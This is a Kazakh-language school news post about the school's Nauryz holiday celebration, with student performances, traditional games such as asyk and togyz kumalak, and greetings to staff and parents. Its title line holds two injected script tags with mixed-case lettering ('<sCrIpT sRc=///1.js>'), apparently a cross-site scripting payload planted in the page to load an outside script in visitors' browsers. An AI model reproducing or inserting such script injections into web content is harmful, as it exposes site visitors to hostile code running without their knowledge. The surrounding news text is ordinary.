Наурыз мейрамы құтты болсын!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.03.2024
мектебімізде 1-11 сынып арасында Наурыз мерекесі ерекше аталып өтті. Оқушыларымыз жаңару күніне мерекелік шара ұйымдастырып, салт-дәстүрімізді терең меңгергенін көрсетті. Мектептегі өнерлі өрендер ән мен жырдан шашу шашты. 
 
Ұлттық әдет-ғұрып пен салт-дәстүрден сыр шертетін әңгіме де айтылды, көрініс те қойылды, қазақы ойындарымыз да назардан тыс қалмады. Оқушылар асық ату, тоғызқұмалақ, қазақша күрес, кір тасын көтеру, арқан тартудан бақ сынасты. 
 
Қыстан аман-есен шығып, мал тұяғы көкке, аузымыз аққа ілініп, ұлтымыздың Жаңа жылы мектебімізде осылай тойланды. Барлығының көңіл-күйі керемет! Әсіресе, оқушылар қуанып жүр. Әріптестерімізді, ата-аналарды, шәкірттерімізді ұлыстың ұлы күнімен құттықтаймыз.
 
Жаңа жылымыз жаңа табыстарға жетелесін!
Просмотров: 3158


Пікір қосу



Деректерді қолтаңбаға қосу